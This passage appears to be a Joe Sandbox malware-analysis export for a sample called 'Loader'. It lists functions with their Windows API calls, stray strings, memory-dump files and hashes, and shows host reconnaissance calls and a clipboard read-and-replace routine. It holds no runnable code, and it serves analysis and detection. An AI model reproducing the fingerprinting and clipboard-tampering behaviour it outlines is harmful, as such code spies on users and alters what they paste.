SysAllocString.OLEAUT32(4F0B4D1F), ref: 00438C4B
VariantInit.OLEAUT32(F2FDFCE7), ref: 00438CBE
SysFreeString.OLEAUT32(?), ref: 00438FAC
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438FE0

Strings

xY`[, xrefs: 00438BD5
UvW, xrefs: 00438BED
Rac, xrefs: 00438C05
'y){, xrefs: 00438C15
&e?g, xrefs: 00438C0D
$%&', xrefs: 00439081
|}, xrefs: 00438C1D

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: UvW$$%&'$&e?g$'y){$Rac$xY`[$|}
API String ID: 505850577-3935235898
Opcode ID: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
Instruction ID: 3c98ca3655e8fbad89b897cedc23f9ec929c21c5d575d6668501c9692a1c22de
Opcode Fuzzy Hash: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
Instruction Fuzzy Hash: 4D32F072A083408BD314CF64C8817ABFBE2EBD9714F18592EF5949B390DB78D905CB96

Function 0041052C Relevance: 23.5, APIs: 2, Strings: 11, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x, xrefs: 00410AE8
A, xrefs: 00410C3A
1, xrefs: 0041053F
b, xrefs: 00410597
G, xrefs: 00410D27
f, xrefs: 00410AE0
[, xrefs: 00410C32
<, xrefs: 00410CAB
p, xrefs: 00410A5A
U, xrefs: 00410982
{, xrefs: 00410DCC

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 1$<$A$G$U$[$b$f$p$x${
API String ID: 0-2596809943
Opcode ID: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
Instruction ID: 977eae197484217fe3de983ef0328e02866eaecbdb9648841de3f436da40142b
Opcode Fuzzy Hash: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
Instruction Fuzzy Hash: 3052907160C7808BD324DB38C5953AFBBE1ABD5314F148A2EE4DAD73C1DA7889858B47

Function 031B1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 031B1032
OpenClipboard.USER32(00000000), ref: 031B103C
GetClipboardData.USER32(0000000D), ref: 031B104C
GlobalLock.KERNEL32(00000000), ref: 031B105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 031B1090
GlobalLock.KERNEL32 ref: 031B10A0
GlobalUnlock.KERNEL32 ref: 031B10C1
EmptyClipboard.USER32 ref: 031B10CB
SetClipboardData.USER32(0000000D), ref: 031B10D6
GlobalFree.KERNEL32 ref: 031B10E3
GlobalUnlock.KERNEL32(?), ref: 031B10ED
CloseClipboard.USER32 ref: 031B10F3
GetClipboardSequenceNumber.USER32 ref: 031B10F9

Memory Dump Source

Source File: 00000003.00000002.3409638386.00000000031B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: true

Associated: 00000003.00000002.3409622522.00000000031B0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3409653107.00000000031B2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_31b0000_Loader.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 322be114c218627d5e9c3cdf243dfca7d8776827b06cac6c668bd45d1e8ab265
Instruction ID: 51646543eef1b37d2ad58d474e3e4b160100742963696c94182be7260ad497ed
Opcode Fuzzy Hash: 322be114c218627d5e9c3cdf243dfca7d8776827b06cac6c668bd45d1e8ab265
Instruction Fuzzy Hash: 9E21B635604250ABD7287B72AC19BAAB7B8FF0C741F0A0838F945D6164F7318885C7B1

Function 004230D3 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DJ, xrefs: 00423659
,@ F, xrefs: 0042311F
IF, xrefs: 00423557
>\:B, xrefs: 00423117
HN, xrefs: 00423661
,D J, xrefs: 00423127
57B, xrefs: 004230DF

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: DJ$,@ F$,D J$57B$>\:B$IF$HN
API String ID: 0-546559132
Opcode ID: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
Instruction ID: 573b38de4df0c584551da9470d46ba7f63cc1349f9138d30f378e2aa21cb097c
Opcode Fuzzy Hash: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
Instruction Fuzzy Hash: 88E1D9B560D3418FD310CF68E89126BBBE1FBC5754F14892DE9818B361E778890ACB4B

Function 00409400 Relevance: 7.9, Strings: 6, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9Z, xrefs: 004096BF
f*Dk, xrefs: 00409531
j*Dk, xrefs: 0040957B
QB, xrefs: 004096C7
E887D0B6A53AEE368246926E533C64D7, xrefs: 004094C4
hi, xrefs: 004097F3

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 9Z$E887D0B6A53AEE368246926E533C64D7$QB$f*Dk$hi$j*Dk
API String ID: 0-861199822
Opcode ID: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
Instruction ID: f303c378167b457a4bc42ceebe78ce79b7bb772c8b3d846b3dc4aa0fafa8ed13
Opcode Fuzzy Hash: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
Instruction Fuzzy Hash: 85B1227161C3808BD718DF65C8516ABBBE2EBD2304F14892DE0E59B392D73CD50ACB5A

Function 0042C98C Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CDAC

Strings

@[/S, xrefs: 0042CE44
YcZ`, xrefs: 0042CF1B
b, xrefs: 0042CDC4

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @[/S$YcZ`$b
API String ID: 3960555810-168354034
Opcode ID: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
Instruction ID: b2947f96fe340a9df3130b14c84d258fde6853037fb12cce7bd63350d2db69b3
Opcode Fuzzy Hash: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
Instruction Fuzzy Hash: 39F1247060C3D18BD729CF29A4A036FFFE1AF96304F18496EE0DA87392D77985058B56

Function 00417745 Relevance: 1.8, APIs: 1, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
Instruction ID: b8f4197d2f7c9f56fe9597a4586bb863907c9934a7ce81ce2e300af997d9591d
Opcode Fuzzy Hash: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
Instruction Fuzzy Hash: 398117B190C2018FC714DF28C8916ABB7F1AF95304F18492EE4D987392E738E945CB9B

Function 00440770 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

TUVW, xrefs: 004407F8, 004408C2

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: TUVW
API String ID: 2994545307-380802359
Opcode ID: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
Instruction ID: 7047d3b5c699d964b661b5aab337125677ab7b56ce49f2f3292149c0b4397d23
Opcode Fuzzy Hash: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
Instruction Fuzzy Hash: 659165717083019FE325DF68D880A2BB7E2EBD6310F18893DE69597391C639DC16CB96

Function 0043DA10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040D11B Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

E887D0B6A53AEE368246926E533C64D7, xrefs: 0040D240

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: E887D0B6A53AEE368246926E533C64D7
API String ID: 0-1823824728
Opcode ID: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
Instruction ID: b8d103c4c60b49fbe0ba22ba74ead3f046f8f308e92d5c9b0b08579b41597fc8
Opcode Fuzzy Hash: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
Instruction Fuzzy Hash: 8C51BC72B407004BDB184F79CC52377B6A3AFE6321F1D967DD0969B7D6E63898028308

Function 0042D0CD Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
Instruction ID: c62614d48869f4b7cb033b57bff67ce6e552f370dc62dc9228bf6d030800f41c
Opcode Fuzzy Hash: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
Instruction Fuzzy Hash: 28412435B083514BD328CA3C9C6137BBBE2DBD6311F688A6DE5D1C7799E639C8018709

Function 0043D4E1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
Instruction ID: dc484de900702ea7fd58ce72979cff842d7c41974bd76ae8d50f3999e681b5d9
Opcode Fuzzy Hash: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
Instruction Fuzzy Hash: AA01DE75A80B108BD7298F24DD6136A77E0EB07304F14806EC592A7780DA7AFD008F99

Function 004336A0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004336E2
GetSystemMetrics.USER32 ref: 004336F2

Strings

zBC, xrefs: 00433840
uDC, xrefs: 004337FE
1, xrefs: 004337D2
=C, xrefs: 0043379B
*?C, xrefs: 00433882
LGC, xrefs: 00433790
AC, xrefs: 004338AE

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: MetricsSystem
String ID: AC$*?C$1$LGC$uDC$zBC$=C
API String ID: 4116985748-682157884
Opcode ID: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
Instruction ID: 1998a03cc5df2a2f33f1525dd043022f22112b898c887f3cf15ef20427d46a93
Opcode Fuzzy Hash: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
Instruction Fuzzy Hash: 979149B011A384CBE774EF11C5597CFBAE1AB82308F11891ED29D4B250DBBA450DDF9A

Function 004085B0 Relevance: 7.6, APIs: 5, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004085D1
GetCurrentThreadId.KERNEL32 ref: 004085D7
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085E8
GetForegroundWindow.USER32 ref: 0040869C
ExitProcess.KERNEL32 ref: 004086DB

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
Instruction ID: 509b8593f85bca22239e70e965a689bc814e36a94043752a13a9102ecda549f4
Opcode Fuzzy Hash: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
Instruction Fuzzy Hash: BF2168B1E002005BD7147F319D0A72A76959F86705F0A863EECD5BB3E7EE3D8811865E

Function 0042BDF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042BE25
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Strings

#v, xrefs: 0042BE25

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: #v
API String ID: 2904949787-554117064
Opcode ID: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
Instruction ID: 4b0124f1363a5f6538044442258c4939d1b124f166065c956affb4ec42b5f0b7
Opcode Fuzzy Hash: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
Instruction Fuzzy Hash: 7731F53522C3918FD7218B35D8107EBBBE5AF9A314F99486EC1C8D7252DB788806C791

Function 0042BDEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042BE25
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Strings

#v, xrefs: 0042BE25

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: #v
API String ID: 2904949787-554117064
Opcode ID: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
Instruction ID: b0442a1b6006627bfac749667bf69648ea68c72265edfd0c76de215cb43adc1f
Opcode Fuzzy Hash: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
Instruction Fuzzy Hash: 6A21F8352683918FD721DB35DC107EBBBE6EB9A314F99492ED1C9C7252DB7488028781

Function 0042BF32 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB

Strings

Jk, xrefs: 0042BF7F

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID: Jk
API String ID: 3545744682-2435780000
Opcode ID: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
Instruction ID: f8b6963ffdad34389f8e41c28869e3d9660b03a655e2583e95d8d3bda7f56e74
Opcode Fuzzy Hash: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
Instruction Fuzzy Hash: 9221253550C7904ADB32CB3998647EBBBE09F97304F094A6DC4DDC7286DB384405CB96

Function 0042BF30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB

Strings

Jk, xrefs: 0042BF7F

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID: Jk
API String ID: 3545744682-2435780000
Opcode ID: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
Instruction ID: 1eb15b467228e91927b88c1530aa4184b94cdc4fa3224a7153598cd3ef29f343
Opcode Fuzzy Hash: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
Instruction Fuzzy Hash: 85113036608B904BDB31CB389C287EBBBD09F96310F194B2DC4DDC7295EB3848018B92

Function 00436A38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436A65

Strings

u, xrefs: 00436A73

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: u
API String ID: 95929093-4067256894
Opcode ID: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
Instruction ID: f3c22d90c568ecaed0f3cc6f16dafd322a7d18ae38fc015f3be8ab71a63a4f26
Opcode Fuzzy Hash: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
Instruction Fuzzy Hash: 29010434C082929FCF119F78C9403EE7FA16F1B310F1986A9C4D567386D7398A058B96

Function 0040CAD6 Relevance: 3.1, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADA
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CC22

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
Instruction ID: a48d5ef0adb5250571e8a41bd9df73004e022a6934e4612084ba1943594d6038
Opcode Fuzzy Hash: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
Instruction Fuzzy Hash: A741E4B4D10B00AFD370EF39DA4B7127EB4AB05250F404B2DF9EA866D4E631A4198BD7

Function 0043E9A1 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043E9A1
GetForegroundWindow.USER32 ref: 0043E9B3

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
Instruction ID: 1f1a92c4ed7c3cabed4fabd3d678f137bf463a9ca5e289bc5fa2f09bb69a997d
Opcode Fuzzy Hash: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
Instruction Fuzzy Hash: B7D012B9C000068BDF44DFA0FC8D44E7769BE46619F045035E40343122E93495068B4D

Function 0042BD74 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
Instruction ID: 2ec592fbdc78758a6a3c226a3e8484dbb67dbcc7126bdc08d1755178837746e5
Opcode Fuzzy Hash: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
Instruction Fuzzy Hash: 472129352283918FD720DB35DC107EBBBE5EB9A324F994C2EC1C8C7252DB7488028781

Function 0043D990 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00439407,00A76950,00000000,00A76950,00439407,00000000,00004000,?,?,?,?,00000001,00A76950,000001EB), ref: 0043D9C2

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
Instruction ID: b8b631638b18798679597f3341c455e23d05a83346a63bcdeeebd9bf56da5e38
Opcode Fuzzy Hash: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
Instruction Fuzzy Hash: EFF0277A8582A0FBC6116F25BC02A9B3664EF8F315F01147BF401A6121DB3ADC06D6DF

Function 00432919 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432965

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
Instruction ID: 24518978adee5ca75fa83efdf11994bb0dab04cffabc163f3a89706635ba24a8
Opcode Fuzzy Hash: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
Instruction Fuzzy Hash: 92F0A4B45093518FE321DF25D56974FBBE4BB88348F11891CE8945B291C7B99A488FC2

Function 0042E1EE Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E237

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
Instruction ID: a6a0066e54c7d049ab9ba52ee2f517c0d060c6457a62882aa2ba7396dcee3bc7
Opcode Fuzzy Hash: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
Instruction Fuzzy Hash: 2CF07AB45087018FD354DF25D5A875BBBE0FB85304F00881DE5D68B290DBB59A48CF86

Function 0040CC67 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC79

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
Instruction ID: 2b78fd6e66c85e2770e1fedaeca4d467f1847f566c0c49e5f6124588b814a6a2
Opcode Fuzzy Hash: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
Instruction Fuzzy Hash: C6D092353D83417BF9645B08AD53F1072509746F16F310624B323FE2E5C9906501860C

Function 0043BD40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,004146B4,00000000), ref: 0043BD60

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

